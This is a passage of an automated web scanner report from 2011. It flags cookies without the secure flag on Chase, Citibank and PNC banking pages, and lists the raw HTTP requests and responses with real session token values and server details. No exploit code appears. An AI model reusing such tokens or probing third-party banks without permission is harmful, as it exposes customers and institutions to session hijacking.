The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /online/logon/on_successful_logon.jsp HTTP/1.1
Host: www.chase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mvt_experience=OUT_MVT; v1st=60B8BEB245ABF79;

Response

HTTP/1.1 301 Moved Permanently
Server: JPMC1.0
Date: Wed, 02 Feb 2011 22:16:34 GMT
Content-type: text/html;charset=UTF-8
CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Location: http://www.chase.com/cm/cs?urlname=shared/crb/page/notfound.jsp
Set-Cookie: DCTMSESSION=NKdvNJXCtfpNBvzYPBCnfP7wBLN2Mt3mCwB2QVmpcRW091j5sTGT!-1658401948; path=/
Connection: close

<!--Generated by WebLogic Workshop-->


<html><head><title>302 Moved Temporarily</title></head>
<bo
...[SNIP]...

6.56. https://www.citibank.com/us/cards/index.jsp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.citibank.com
Path:   /us/cards/index.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /us/cards/index.jsp HTTP/1.1
Host: www.citibank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: ""
Date: Wed, 02 Feb 2011 22:16:55 GMT
Content-length: 854
Content-type: text/html; charset=ISO-8859-1
Cache-Control: no-cache="Set-Cookie"
Set-Cookie: JSESSIONID=GlQxNJXX9hjkzSqQqQWNphxfGRm78JMp2dwJ21YKmvTyYW6xpK69!-455328445; path=/
Connection: close

<html>
<head>
<title>Citi Credit Cards | Choose from a variety of Rewards Credit Cards, Student
Credit Cards, Small Business Credit Cards, and Value Credit Cards.</title>
<meta name="keywords" co
...[SNIP]...

6.57. https://www.esp01.pnc.com/LaunchPad/dflt/Login.pncadv  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.esp01.pnc.com
Path:   /LaunchPad/dflt/Login.pncadv

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /LaunchPad/dflt/Login.pncadv HTTP/1.1
Host: www.esp01.pnc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:18:09 GMT
Server: Apache
Set-Cookie: JSESSIONID=0001MlXU1BY2vtyfBtHvrPCXhsj:pr-rdc678-61015gis-a/espts-ethasp8; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 7069


<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<HTML xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" lang="en">
<HEAD>
   <TI
...[SNIP]...

6.58. https://www.onlinebanking.pnc.com/alservlet/ForgotUserIdServlet  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.onlinebanking.pnc.com
Path:   /alservlet/ForgotUserIdServlet

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /alservlet/ForgotUserIdServlet HTTP/1.1
Host: www.onlinebanking.pnc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:20:02 GMT
Set-Cookie: TLTSID=9475541C2F1A102F354FD76FFB2DDB3C; Path=/; Domain=.pnc.com
Set-Cookie: TLTUID=9475541C2F1A102F354FD76FFB2DDB3C; Path=/; Domain=.pnc.com; Expires=Wed, 02-02-2021 22:20:02 GMT
X-HP-CAM-COLOR: V=1;ServerAddr=a2rTe6HbXeEUyxbPOB/wDA==;GUID=1|SOvXcHCTZwCP2IOhhrT_-R3ODct1iF1OWGlj8LUk9syXcKsRohI8ZicVwfm-BX0p|L2Fsc2VydmxldC9Gb3Jnb3RVc2VySWRTZXJ2bGV0
Pragma: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Cache-Control: no-cache, max-age=0, s-maxage=0, must-revalidate, proxy-revalidate, no-store, private
Content-Length: 6173
Set-Cookie: JSESSIONID=0000nBH4sfMW7CTudVPIJFBuabh:pr-rdc910-61021wbb-a/wbbob.0-ethprod9; Path=/
Set-Cookie: JSESSIONID=0000oDYthmTWj122o-2a9jXeLh-:pr-rdc910-61021wbb-a/wbbob.0-ethprod9; Path=/
Keep-Alive: timeout=60, max=297
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Set-Cookie: NSC_q*xccpc-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423992;path=/;secure;httponly
Set-Cookie: NSC_q*xccpc-w0-htmc*443=ffffffffa9c1221345525d5f4f58455e445a4a420000;path=/;secure;httponly


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
...[SNIP]...

6.59. https://www.onlinebanking.pnc.com/alservlet/OnlineBankingServlet  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.onlinebanking.pnc.com
Path:   /alservlet/OnlineBankingServlet

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /alservlet/OnlineBankingServlet HTTP/1.1
Host: www.onlinebanking.pnc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:20:02 GMT
Set-Cookie: TLTSID=942C620C2F1A102F3549D76FFB2DDB3C; Path=/; Domain=.pnc.com
Set-Cookie: TLTUID=942C620C2F1A102F3549D76FFB2DDB3C; Path=/; Domain=.pnc.com; Expires=Wed, 02-02-2021 22:20:02 GMT
X-HP-CAM-COLOR: V=1;ServerAddr=a2rTe6HbXeEUyxbPOB/wDA==;GUID=1|SOvXcHCTZwCP2IOhhrT_-R3ODct1iF1OWGlj8LUk9syXcKsRohI8ZicVwfm-BX0p|L2Fsc2VydmxldC9PbmxpbmVCYW5raW5nU2VydmxldA..
Content-Length: 4786
Set-Cookie: JSESSIONID=0000BdPbwUSdfmxZ303XrJmvcTx:pr-rdc910-61021wbb-a/wbbob.0-ethprod9; Path=/
Set-Cookie: JSESSIONID=0000ZZetK8QvUfDV8Q-gaArIsLv:pr-rdc910-61021wbb-a/wbbob.0-ethprod9; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Keep-Alive: timeout=60, max=299
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Set-Cookie: NSC_q*xccpc-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423992;path=/;secure;httponly
Set-Cookie: NSC_q*xccpc-w0-htmc*443=ffffffffa9c1221345525d5f4f58455e445a4a420000;path=/;secure;httponly

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
   <title>PNC Bank Online Banking</title>
<meta http-equiv="Expires" content="
...[SNIP]...

6.60. https://www.pnc.com/webapp/sec/Forms.do  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.pnc.com
Path:   /webapp/sec/Forms.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/sec/Forms.do HTTP/1.1
Host: www.pnc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993; WT_FPC=id=282bf7f27292da7778c1296687699805:lv=1296687699805:ss=1296687699805; PNCSessionCookie=/pnccorp/PNC/Home/Personal; dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:45:41 GMT
X-HP-CAM-COLOR: V=1;ServerAddr=s946rsl6iu+IpV6oNJLx5Q==;GUID=1|j3jZu7GYX8yqvDh4FQGt9tEmdziTvP87_uyUWYhubxmmEX9A1OQ1yhjc181CfiMT|L3dlYmFwcC9zZWMvRm9ybXMuZG8.
Surrogate-Control: no-store, content="ESI/1.0+"
Set-Cookie: dotdvSession=0001S1Sh72Ze-pqHTl-FGyJ5l8c:pr-rdc9101516-61027wcm-a/dotdv-ethasp9; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Keep-Alive: timeout=60, max=240
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 3486

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
<title>Welcome to PNC - Fatal Error</title>
<meta http-equiv="Con
...[SNIP]...

6.61. https://www.pnc.com/webapp/sec/ProductsAndService.do  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.pnc.com
Path:   /webapp/sec/ProductsAndService.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/sec/ProductsAndService.do HTTP/1.1
Host: www.pnc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993; WT_FPC=id=282bf7f27292da7778c1296687699805:lv=1296687699805:ss=1296687699805; PNCSessionCookie=/pnccorp/PNC/Home/Personal; dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:45:41 GMT
X-HP-CAM-COLOR: V=1;ServerAddr=s946rsl6iu+IpV6oNJLx5Q==;GUID=1|j3jZu7GYX8yqvDh4FQGt9tEmdziTvP87_uyUWYhubxmmEX9A1OQ1yhjc181CfiMT|L3dlYmFwcC9zZWMvUHJvZHVjdHNBbmRTZXJ2aWNlLmRv
Surrogate-Control: no-store, content="ESI/1.0+"
Set-Cookie: dotdvSession=0001Fwo1y4EQ_DNlPzYBA3fDCSC:pr-rdc9101516-61027wcm-a/dotdv-ethasp9; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Keep-Alive: timeout=60, max=240
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 3486

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
<title>Welcome to PNC - Fatal Error</title>
<meta http-equiv="Con
...[SNIP]...

6.62. https://www.pnc.com/webapp/unsec/Blank.do  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.pnc.com
Path:   /webapp/unsec/Blank.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/unsec/Blank.do HTTP/1.1
Host: www.pnc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993; WT_FPC=id=282bf7f27292da7778c1296687699805:lv=1296687699805:ss=1296687699805; PNCSessionCookie=/pnccorp/PNC/Home/Personal; dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:45:34 GMT
X-HP-CAM-COLOR: V=1;ServerAddr=s946rsl6iu+IpV6oNJLx5Q==;GUID=1|j3jZu7GYX8yqvDh4FQGt9tEmdziTvP87_uyUWYhubxmmEX9A1OQ1yhjc181CfiMT|L3dlYmFwcC91bnNlYy9CbGFuay5kbw..
Surrogate-Control: no-store, content="ESI/1.0+"
Set-Cookie: dotdvSession=0001LOQyaoJEXxHD4aAHzu03qO2:pr-rdc9101516-61027wcm-a/dotdv-ethasp9; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Keep-Alive: timeout=60, max=35
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 3486

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
<title>Welcome to PNC - Fatal Error</title>
<meta http-equiv="Con
...[SNIP]...

6.63. https://www.pnc.com/webapp/unsec/Gateway.do  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.pnc.com
Path:   /webapp/unsec/Gateway.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/unsec/Gateway.do?siteArea=/pnccorp/PNC/Home HTTP/1.1
Host: www.pnc.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993

Response

HTTP/1.1 302 Found
Date: Wed, 02 Feb 2011 22:00:35 GMT
X-HP-CAM-COLOR: V=1;ServerAddr=s946rsl6iu+IpV6oNJLx5Q==;GUID=1|j3jZu7GYX8yqvDh4FQGt9tEmdziTvP87_uyUWYhubxmmEX9A1OQ1yhjc181CfiMT|L3dlYmFwcC91bnNlYy9HYXRld2F5LmRv
Surrogate-Control: no-store
Location: https://www.pnc.com/webapp/unsec/Homepage.do?siteArea=/pnccorp/PNC/Home/Personal
Content-Length: 0
Set-Cookie: dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Keep-Alive: timeout=60, max=218
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en-US


6.64. https://www.pnc.com/webapp/unsec/Homepage.do  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.pnc.com
Path:   /webapp/unsec/Homepage.do

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/unsec/Homepage.do?siteArea=/pnccorp/PNC/Home/Small+Business HTTP/1.1
Host: www.pnc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993; WT_FPC=id=282bf7f27292da7778c1296687699805:lv=1296687699805:ss=1296687699805; PNCSessionCookie=/pnccorp/PNC/Home/Personal; dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:45:33 GMT
X-HP-CAM-COLOR: V=1;ServerAddr=s946rsl6iu+IpV6oNJLx5Q==;GUID=1|j3jZu7GYX8yqvDh4FQGt9tEmdziTvP87_uyUWYhubxmmEX9A1OQ1yhjc181CfiMT|L3dlYmFwcC91bnNlYy9Ib21lcGFnZS5kbw..
Surrogate-Control: no-store, content="ESI/1.0+"
Set-Cookie: dotdvSession=00019a3ZBh0mh-ispl7txSa1-Wc:pr-rdc9101516-61027wcm-a/dotdv-ethasp9; Path=/
Set-Cookie: PNCSessionCookie=/pnccorp/PNC/Home/Small Business; Expires=Thu, 02 Feb 2012 23:45:33 GMT; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Keep-Alive: timeout=60, max=228
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 41061

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">



...[SNIP]...

6.65. https://www.pnc.com/webapp/unsec/Homepage.do  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.pnc.com
Path:   /webapp/unsec/Homepage.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/unsec/Homepage.do HTTP/1.1
Host: www.pnc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993; WT_FPC=id=282bf7f27292da7778c1296687699805:lv=1296687699805:ss=1296687699805; PNCSessionCookie=/pnccorp/PNC/Home/Personal; dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:45:33 GMT
X-HP-CAM-COLOR: V=1;ServerAddr=s946rsl6iu+IpV6oNJLx5Q==;GUID=1|j3jZu7GYX8yqvDh4FQGt9tEmdziTvP87_uyUWYhubxmmEX9A1OQ1yhjc181CfiMT|L3dlYmFwcC91bnNlYy9Ib21lcGFnZS5kbw..
Surrogate-Control: no-store, content="ESI/1.0+"
Set-Cookie: dotdvSession=0001izITxKXJDZCTx_1za1z1i8N:pr-rdc9101516-61027wcm-a/dotdv-ethasp9; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Keep-Alive: timeout=60, max=37
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 3486

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
<title>Welcome to PNC - Fatal Error</title>
<meta http-equiv="Con
...[SNIP]...

6.66. https://www.pnc.com/webapp/unsec/NCProductsAndService.do  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.pnc.com
Path:   /webapp/unsec/NCProductsAndService.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/unsec/NCProductsAndService.do HTTP/1.1
Host: www.pnc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993; WT_FPC=id=282bf7f27292da7778c1296687699805:lv=1296687699805:ss=1296687699805; PNCSessionCookie=/pnccorp/PNC/Home/Personal; dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:45:37 GMT
X-HP-CAM-COLOR: V=1;ServerAddr=s946rsl6iu+IpV6oNJLx5Q==;GUID=1|j3jZu7GYX8yqvDh4FQGt9tEmdziTvP87_uyUWYhubxmmEX9A1OQ1yhjc181CfiMT|L3dlYmFwcC91bnNlYy9OQ1Byb2R1Y3RzQW5kU2VydmljZS5kbw..
Surrogate-Control: no-store, content="ESI/1.0+"
Set-Cookie: dotdvSession=0001DxdakGVfzPsG61OoYwy6MqQ:pr-rdc9101516-61027wcm-a/dotdv-ethasp9; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Keep-Alive: timeout=60, max=297
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 3486

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
<title>Welcome to PNC - Fatal Error</title>
<meta http-equiv="Con
...[SNIP]...

6.67. https://www.pnc.com/webapp/unsec/ProductsAndService.do  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.pnc.com
Path:   /webapp/unsec/ProductsAndService.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/unsec/ProductsAndService.do HTTP/1.1
Host: www.pnc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993; WT_FPC=id=282bf7f27292da7778c1296687699805:lv=1296687699805:ss=1296687699805; PNCSessionCookie=/pnccorp/PNC/Home/Personal; dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:45:40 GMT
X-HP-CAM-COLOR: V=1;ServerAddr=s946rsl6iu+IpV6oNJLx5Q==;GUID=1|j3jZu7GYX8yqvDh4FQGt9tEmdziTvP87_uyUWYhubxmmEX9A1OQ1yhjc181CfiMT|L3dlYmFwcC91bnNlYy9Qcm9kdWN0c0FuZFNlcnZpY2UuZG8.
Surrogate-Control: no-store, content="ESI/1.0+"
Set-Cookie: dotdvSession=0001aNea8mTi43JnvTKJteRIuXq:pr-rdc9101516-61027wcm-a/dotdv-ethasp9; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Keep-Alive: timeout=60, max=294
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 3486

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
<title>Welcome to PNC - Fatal Error</title>
<meta http-equiv="Con
...[SNIP]...

6.68. https://www.pnc.com/webapp/unsec/Solutions.do  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.pnc.com
Path:   /webapp/unsec/Solutions.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/unsec/Solutions.do HTTP/1.1
Host: www.pnc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993; WT_FPC=id=282bf7f27292da7778c1296687699805:lv=1296687699805:ss=1296687699805; PNCSessionCookie=/pnccorp/PNC/Home/Personal; dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:45:37 GMT
X-HP-CAM-COLOR: V=1;ServerAddr=s946rsl6iu+IpV6oNJLx5Q==;GUID=1|j3jZu7GYX8yqvDh4FQGt9tEmdziTvP87_uyUWYhubxmmEX9A1OQ1yhjc181CfiMT|L3dlYmFwcC91bnNlYy9Tb2x1dGlvbnMuZG8.
Surrogate-Control: no-store, content="ESI/1.0+"
Set-Cookie: dotdvSession=0001ldWPeHvvluWAoHv09MIUxYB:pr-rdc9101516-61027wcm-a/dotdv-ethasp9; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Keep-Alive: timeout=60, max=300
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 3486

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
<title>Welcome to PNC - Fatal Error</title>
<meta http-equiv="Con
...[SNIP]...

6.69. https://www.pnc.com/webapp/unsec/depositRates/init.app  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.pnc.com
Path:   /webapp/unsec/depositRates/init.app

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/unsec/depositRates/init.app HTTP/1.1
Host: www.pnc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993; WT_FPC=id=282bf7f27292da7778c1296687699805:lv=1296687699805:ss=1296687699805; PNCSessionCookie=/pnccorp/PNC/Home/Personal; dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:45:41 GMT
X-HP-CAM-COLOR: V=1;ServerAddr=s946rsl6iu+IpV6oNJLx5Q==;GUID=1|j3jZu7GYX8yqvDh4FQGt9tEmdziTvP87_uyUWYhubxmmEX9A1OQ1yhjc181CfiMT|L3dlYmFwcC91bnNlYy9kZXBvc2l0UmF0ZXMvaW5pdC5hcHA.
Surrogate-Control: no-store, content="ESI/1.0+"
Set-Cookie: dotdvSession=0001ezUIBevmL8Xq9sXEck-tZO6:pr-rdc9101516-61027wcm-a/dotdv-ethasp9; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Keep-Alive: timeout=60, max=171
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 40302

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
<title>Welcome to PNC - Interest Rate Center</title>
<meta http-e
...[SNIP]...

6.70. https://www.pnc.com/webapp/unsec/homeEquity/init.app  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.pnc.com
Path:   /webapp/unsec/homeEquity/init.app

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/unsec/homeEquity/init.app HTTP/1.1
Host: www.pnc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993; WT_FPC=id=282bf7f27292da7778c1296687699805:lv=1296687699805:ss=1296687699805; PNCSessionCookie=/pnccorp/PNC/Home/Personal; dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:45:41 GMT
X-HP-CAM-COLOR: V=1;ServerAddr=s946rsl6iu+IpV6oNJLx5Q==;GUID=1|j3jZu7GYX8yqvDh4FQGt9tEmdziTvP87_uyUWYhubxmmEX9A1OQ1yhjc181CfiMT|L3dlYmFwcC91bnNlYy9ob21lRXF1aXR5L2luaXQuYXBw
Surrogate-Control: no-store, content="ESI/1.0+"
Set-Cookie: dotdvSession=0001jrfZahTqT5UlJ4rk1xtE_Dy:pr-rdc9101516-61027wcm-a/dotdv-ethasp9; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Keep-Alive: timeout=60, max=217
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 39863

